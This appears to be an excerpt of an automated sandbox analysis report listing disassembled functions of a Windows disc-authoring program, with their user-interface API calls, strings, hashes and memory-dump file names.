Opcode Fuzzy Hash: ca84e534a2f6c12004421dbfa5f0154ae26921da3dd2359e7799b52220722ef3
Instruction Fuzzy Hash: 3941A9717403047BE720EB669D82F777399AFC8B04F50581EB7469B6D0CAB8F8008769

Function 00468710 Relevance: 19.6, APIs: 13, Instructions: 114windowCOMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?,AD5E0258), ref: 00468757
GetClientRect.USER32(?,?), ref: 00468771
CreateCompatibleDC.GDI32(?), ref: 0046877C
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00468793
SelectObject.GDI32(00000000,00000000), ref: 004687A3
GetSysColorBrush.USER32(0000000F), ref: 004687AB
FillRect.USER32(00000000,?,00000000), ref: 004687B8
BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00468800
SelectObject.GDI32(00000000,?), ref: 0046880C
ReleaseDC.USER32(?,?), ref: 00468817
DeleteDC.GDI32(00000000), ref: 0046881E
DeleteObject.GDI32(00000000), ref: 00468825
EndPaint.USER32(?,?), ref: 00468835

Part of subcall function 00468450: FillRect.USER32(?,?,?), ref: 004684AC

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ObjectRect$CompatibleCreateDeleteFillPaintSelect$BeginBitmapBrushClientColorRelease
String ID:
API String ID: 996901509-0
Opcode ID: 370e28d7df3d599adb50412862e9a4c7ee36951e2a89baa67ea66b6acd555989
Instruction ID: f91889fec47050e79a3254342d066846b5108a5d53c71964b40b3682baaabc45
Opcode Fuzzy Hash: 370e28d7df3d599adb50412862e9a4c7ee36951e2a89baa67ea66b6acd555989
Instruction Fuzzy Hash: 1B4138B1204301AFD354DB64DD54F6BBBE9FBC8714F104A2DF64983250DB34A904CB6A

Function 0041B110 Relevance: 19.6, APIs: 13, Instructions: 105windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000426), ref: 0041B12C
SendMessageW.USER32(00000000,00000406,00000001,0002FFFE), ref: 0041B14A
SendMessageW.USER32(?,0000041F,00000002,00000000), ref: 0041B159
CheckDlgButton.USER32(?,0000041F,00000000), ref: 0041B172
CheckDlgButton.USER32(?,00000420), ref: 0041B185
CheckDlgButton.USER32(?,00000421), ref: 0041B198
CheckDlgButton.USER32(?,00000422,00000000), ref: 0041B1AB
CheckDlgButton.USER32(?,00000423), ref: 0041B1BE
CheckDlgButton.USER32(?,00000424), ref: 0041B1D1
CheckDlgButton.USER32(?,00000425,00000000), ref: 0041B1E4
SendMessageW.USER32(?,00000405,00000001,00000000), ref: 0041B1F8
SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0041B207
SetDlgItemTextW.USER32(?,00000427,?), ref: 0041B22A

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ButtonCheck$MessageSend$Item$Text
String ID:
API String ID: 374901954-0
Opcode ID: 8325e234e4f5cf6722f148a98e7fc2fdc47cb66710c25b0bb3c54dcd6a7765ce
Instruction ID: 8f7d36115910faedb636db1678614bf88cdbf8bcd5b259f5119449bdbac71a25
Opcode Fuzzy Hash: 8325e234e4f5cf6722f148a98e7fc2fdc47cb66710c25b0bb3c54dcd6a7765ce
Instruction Fuzzy Hash: C83181B57403407BE214A7659D92F37B7E9EBC8B00F00892DB7959B2D2C6B4F8048B28

Function 00452D70 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 309windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00446A40: GetClientRect.USER32 ref: 00446A65
Part of subcall function 00446A40: SetWindowPos.USER32(?,00000000,00000000,?,00000000,?,00000014), ref: 00446AA0

Part of subcall function 00446DB0: InvalidateRect.USER32(?,00000001,00000001), ref: 00446E1D
Part of subcall function 00446DB0: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000004), ref: 00446E66

Part of subcall function 004483B0: MulDiv.KERNEL32(?,00002710,?), ref: 00448423

Part of subcall function 00431E10: SendMessageW.USER32(?,00000430,00000000,?), ref: 00431E20

Part of subcall function 00431F10: SendMessageW.USER32 ref: 00431F56
Part of subcall function 00431F10: SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00431F67

Part of subcall function 00431EA0: SendMessageW.USER32 ref: 00431EDF
Part of subcall function 00431EA0: SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00431EF0

Part of subcall function 00431F80: SendMessageW.USER32(00000000,00000418,00000000,00000000), ref: 00431F9E
Part of subcall function 00431F80: SendMessageW.USER32(?,0000041D,00000000,?), ref: 00431FB3
Part of subcall function 00431F80: SendMessageW.USER32(?,00000418,00000000,00000000), ref: 00431FCD
Part of subcall function 00431F80: SendMessageW.USER32(?,0000043A,00000000,00000000), ref: 00431FE0
Part of subcall function 00431F80: SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00431FF6

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00452EB4
SetWindowLongW.USER32(?,000000FC,?), ref: 00452EE6

Part of subcall function 0045B700: IsWindowVisible.USER32(?), ref: 0045B721
Part of subcall function 0045B700: ShowWindow.USER32(?,00000005,?,0045CFE0,dvd,00000000,type,AD5E0258,version,?,Project,FeyWriter), ref: 0045B737
Part of subcall function 0045B700: ShowWindow.USER32(?,00000000,?,0045CFE0,dvd,00000000,type,AD5E0258,version,?,Project,FeyWriter), ref: 0045B73E
Part of subcall function 0045B700: SendMessageW.USER32(?,00001101,00000000,FFFF0000), ref: 0045B781
Part of subcall function 0045B700: SendMessageW.USER32(?,00001009,00000000,00000000), ref: 0045B796

SendMessageW.USER32(?,00001036,00000000,00010030), ref: 00452F2E
LoadMenuW.USER32(?,000000D6), ref: 00452F45
LoadMenuW.USER32(?,000000D7), ref: 00452F59
_memset.LIBCMT ref: 00452F6C
SetMenuItemInfoW.USER32 ref: 00452F9F
SetMenuItemInfoW.USER32(?,00008019,00000000,00000000), ref: 00452FB4
SetMenuItemInfoW.USER32(?,0000801A,00000000,00000000), ref: 00452FC9
SetMenuItemInfoW.USER32(?,0000801B,00000000,00000000), ref: 00452FDE

Strings

,, xrefs: 00452F87

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$Window$Menu$InfoItem$LoadRectShow$ClientInvalidateLongVisible_memset
String ID: ,
API String ID: 16434914-3772416878
Opcode ID: de1d63a01ef767100e248f7513ad7fcc383dc1813a4d1e31591e9108d147d793
Instruction ID: 9a2e5f19e13279f8c3c6372a0e6c593f32c93f3e4dc9534a5137e7220f13343e
Opcode Fuzzy Hash: de1d63a01ef767100e248f7513ad7fcc383dc1813a4d1e31591e9108d147d793
Instruction Fuzzy Hash: 09B1B3B03447046BE724DF69CC96FA773D5EB88704F00451EF65A9B2C1DBB9B8048769

Function 0043B0F0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,?), ref: 0043B133
SetDlgItemTextW.USER32(?,00000001,?), ref: 0043B15D
SetDlgItemTextW.USER32(?,00000002,?), ref: 0043B17C
SetDlgItemTextW.USER32(?,00000485,?), ref: 0043B1A1
SetDlgItemTextW.USER32(?,000003F2,?), ref: 0043B1C6
SetDlgItemTextW.USER32(?,000003F4,?), ref: 0043B1EB
SetDlgItemTextW.USER32(?,000003F6,?), ref: 0043B210

Strings

erase, xrefs: 0043B105

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Text$Item$Window
String ID: erase
API String ID: 820206838-639203778
Opcode ID: 1860f0b9f8ef27a5054284f486b910978d45d305e6aa5451a8b11863a9d483e9
Instruction ID: 60785e2f5d58585e92872ba7e5de405bddbe17023b21425e7a88025be2df2c68
Opcode Fuzzy Hash: 1860f0b9f8ef27a5054284f486b910978d45d305e6aa5451a8b11863a9d483e9
Instruction Fuzzy Hash: F5415EB52443017FDA08DB50CC92E7BA35EEBC8754F00C96EBB564B282DB78E905CB94

Function 0041A670 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 0041A694

Part of subcall function 00476150: lstrcmpW.KERNEL32(004156AC,?,00000000,?,?,004156AC,translation,00000000,?,?,?,?,00000000,?,00000000), ref: 0047616D

SetWindowTextW.USER32(?,?), ref: 0041A6DB
SetDlgItemTextW.USER32(?,00000001,?), ref: 0041A700
SetDlgItemTextW.USER32(?,00000002,?), ref: 0041A71F
SetDlgItemTextW.USER32(?,00000485,?), ref: 0041A744
SetDlgItemTextW.USER32(?,000004A1,?), ref: 0041A769
SetDlgItemTextW.USER32(?,000004A3,?), ref: 0041A78E
SetDlgItemTextW.USER32(?,000004A4,?), ref: 0041A7B3
SetDlgItemTextW.USER32(?,000004A7,?), ref: 0041A7D8
SetDlgItemTextW.USER32(?,000004A9,?), ref: 0041A7FD

Strings

addbootimage, xrefs: 0041A6A7

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Text$Item$Window$lstrcmp
String ID: addbootimage
API String ID: 849189416-1697594388
Opcode ID: f6ac0aeef80b5a97dd53d2a2672b22ca17188825f030aa54b0ed5378894a9d6e
Instruction ID: fb5d4d9518e1b9786da81570a7676706168e1ce1c095fe56d6339e95197effcb
Opcode Fuzzy Hash: f6ac0aeef80b5a97dd53d2a2672b22ca17188825f030aa54b0ed5378894a9d6e
Instruction Fuzzy Hash: C54178B93443007FD618EBA4CD82EAB739A9BC5714F11C91EFA964B3C2DA74EC058B15

Function 0044F090 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 137windowstringCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 0044F0D9
SendMessageW.USER32(?,?,?,?), ref: 0044F0EE
GetMenuItemCount.USER32 ref: 0044F16C
_memset.LIBCMT ref: 0044F17F
GetMenuItemInfoW.USER32 ref: 0044F1A0
lstrlenW.KERNEL32(?), ref: 0044F1D3
SetMenuItemInfoW.USER32 ref: 0044F1EE
GetMenuItemCount.USER32 ref: 0044F211

Strings

0, xrefs: 0044F198
,, xrefs: 0044F190
1, xrefs: 0044F1B8

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ItemMenu$CountInfo$MessageSendWindow_memsetlstrlen
String ID: ,$0$1
API String ID: 309596465-1763576189
Opcode ID: 6cbdfad495a1358ed80680dbe0e8bba3964dbf4f57e2d263ee703c393dab2d2a
Instruction ID: 7341ed37d01ec1df1245dddc7272746d1784016eba99d811a82870f8aa0d046e
Opcode Fuzzy Hash: 6cbdfad495a1358ed80680dbe0e8bba3964dbf4f57e2d263ee703c393dab2d2a
Instruction Fuzzy Hash: 60418F751043419FE720CF59D885B5BB7F8FB89304F10482EFA8583352D7BAA849CB6A

Function 00460E20 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 118stringwindowCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000C), ref: 00460E4A
GetSystemMetrics.USER32(0000000B), ref: 00460E4F
LoadImageW.USER32(?,000000D5,00000001,00000000), ref: 00460E5A
GetDlgItem.USER32(?,000003FE), ref: 00460E6C
SendMessageW.USER32(00000000,00000170,?,00000000), ref: 00460E7E
SetDlgItemTextW.USER32(?,00000429,004EEB94), ref: 00460E98
SetDlgItemTextW.USER32(?,00000402,00000000), ref: 00460EAE
lstrcatW.KERNEL32(?,?), ref: 00460EEE
SetDlgItemTextW.USER32(?,0000042C,?), ref: 00460F02

Part of subcall function 00477440: _vswprintf_s.LIBCMT ref: 00477459

SetDlgItemTextW.USER32(?,0000042D,?), ref: 00460F63

Strings

(%I64d Bytes), xrefs: 00460ED3

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Item$Text$MetricsSystem$ImageLoadMessageSend_vswprintf_slstrcat
String ID: (%I64d Bytes)
API String ID: 1388463116-262816761
Opcode ID: 0a8945150923da35137cc2bf5756ce76ffb3a1cabc58c09f840b0cf0f7271c52
Instruction ID: 489891484e4559383e473be6430f725103e91d84c989ddb8704b3a169ebd138c
Opcode Fuzzy Hash: 0a8945150923da35137cc2bf5756ce76ffb3a1cabc58c09f840b0cf0f7271c52
Instruction Fuzzy Hash: 713166B1644300BFE314DBA5DC86F6BB7ECEBC8714F00891DB74997291D674E9048B66

Function 004610F0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 118stringwindowCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000C), ref: 0046111A
GetSystemMetrics.USER32(0000000B), ref: 0046111F
LoadImageW.USER32(?,000000D3,00000001,00000000), ref: 0046112A
GetDlgItem.USER32(?,000003FE), ref: 0046113C
SendMessageW.USER32(00000000,00000170,?,00000000), ref: 0046114E
SetDlgItemTextW.USER32(?,00000429,004EEB94), ref: 00461168
SetDlgItemTextW.USER32(?,00000402,00000000), ref: 0046117E
lstrcatW.KERNEL32(?,?), ref: 004611BE
SetDlgItemTextW.USER32(?,0000042C,?), ref: 004611D2

Part of subcall function 00477440: _vswprintf_s.LIBCMT ref: 00477459

SetDlgItemTextW.USER32(?,0000042D,?), ref: 00461233

Strings

(%I64d Bytes), xrefs: 004611A3

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Item$Text$MetricsSystem$ImageLoadMessageSend_vswprintf_slstrcat
String ID: (%I64d Bytes)
API String ID: 1388463116-262816761
Opcode ID: e49b5032415d46f849be4d53799658cd467cc83fdc91ad35c4a70eaa7c1eb1f0
Instruction ID: 7bbd560d69aef7a103bdaad1f7849f444d20ade3a2928c4dd40c102947c1d5b2
Opcode Fuzzy Hash: e49b5032415d46f849be4d53799658cd467cc83fdc91ad35c4a70eaa7c1eb1f0
Instruction Fuzzy Hash: 813186B1644300BFE314DBA5DC82FABB7ECEBC8704F00891DB74997291D674E9048B66

Function 00450C50 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 101windowregistrythreadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(-00000010), ref: 00450CB7
RegisterClipboardFormatW.USER32(WTL_CmdBar_InternalGetBarMsg), ref: 00450CCB
LeaveCriticalSection.KERNEL32(-00000010), ref: 00450CD7
SendMessageW.USER32(?,?,?,00000000), ref: 00450CEC
GetParent.USER32(?), ref: 00450CF1
GetCurrentProcessId.KERNEL32 ref: 00450CFF
IsWindow.USER32 ref: 00450D17
SendMessageW.USER32(00000000,0000037F,00000000,?), ref: 00450D30
GetCurrentThreadId.KERNEL32 ref: 00450D3F
CallNextHookEx.USER32(?,?,?,?), ref: 00450D6F

Part of subcall function 0044F520: EnterCriticalSection.KERNEL32(-00000010), ref: 0044F534
Part of subcall function 0044F520: RegisterClipboardFormatW.USER32(WTL_CmdBar_InternalGetBarMsg), ref: 0044F548
Part of subcall function 0044F520: LeaveCriticalSection.KERNEL32(-00000010), ref: 0044F554

Strings

WTL_CmdBar_InternalGetBarMsg, xrefs: 00450CC6

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: CriticalSection$ClipboardCurrentEnterFormatLeaveMessageRegisterSend$CallHookNextParentProcessThreadWindow
String ID: WTL_CmdBar_InternalGetBarMsg
API String ID: 2515948601-1327875102
Opcode ID: a66e52c0053d13ba76d35175363f35d35b9a113ca0c7f29c1b70a2cc57e8854c
Instruction ID: 34dfb5ef4dc84ee123d76d9daf2e63380498ce9b3518bf6c90e0c71a2e93be11
Opcode Fuzzy Hash: a66e52c0053d13ba76d35175363f35d35b9a113ca0c7f29c1b70a2cc57e8854c
Instruction Fuzzy Hash: A4316E75905311ABD724DF94D844A6BB3B8FB98752F104A2AF88093351DB38AC49CBA9

Function 004509A0 Relevance: 18.2, APIs: 12, Instructions: 209windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000447,00000000,00000000), ref: 004509E9
SendMessageW.USER32(?,00000448,00000000,00000000), ref: 00450A09
GetFocus.USER32 ref: 00450A30
IsWindow.USER32(?), ref: 00450A43
SendMessageW.USER32(?,00000448,000000FF,00000000), ref: 00450A5E
PostMessageW.USER32(00000000,00000100,0000001B,00000000), ref: 00450B3E
PostMessageW.USER32(?,00000100,0000001B,00000000), ref: 00450B68
GetFocus.USER32 ref: 00450BAF
IsWindow.USER32(?), ref: 00450BBE
SendMessageW.USER32(?,00000447,00000000,00000000), ref: 00450BD5
PostMessageW.USER32(?,00000100,00000028,00000000), ref: 00450BFC
PostMessageW.USER32(?,00000448,000000FF,00000000), ref: 00450C2A

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Message$PostSend$FocusWindow
String ID:
API String ID: 2471453093-0
Opcode ID: db7c99d33ecc49e3d25d080a624ca9c6f9e110c5417c38e559c4fad8ca7e7d4d
Instruction ID: afdf9cb7dae227a18ae6d43c29d60e4b371cf89c449b37f6bb6748f5614b1e20
Opcode Fuzzy Hash: db7c99d33ecc49e3d25d080a624ca9c6f9e110c5417c38e559c4fad8ca7e7d4d
Instruction Fuzzy Hash: B1610935200B045BD6359B788C94B9B73D56B91726F208A0FE9E6C63D2CB78B849C718

Function 00438230 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 298COMMON

Download Yara Rule

Strings

disc, xrefs: 00438245

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID:
String ID: disc
API String ID: 0-45045040
Opcode ID: d21b85a9a42eae5b106de6c35dde7a93588b4b9ec697e1b2854416dab02d07f8
Instruction ID: 18b28a7f85a6984ac8aae58ba9548c6a772014891fcc4554d0d131105d437538
Opcode Fuzzy Hash: d21b85a9a42eae5b106de6c35dde7a93588b4b9ec697e1b2854416dab02d07f8
Instruction Fuzzy Hash: E69175B57447006BD614DE65DD82F3BB3AAABC4B04F108D0DFB999B3C2EA64E8048759

Function 004460E0 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 222stringwindowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32 ref: 00446147
SHGetFileInfoW.SHELL32(004C49AC,00000010,?,000002B4,00004010), ref: 00446176
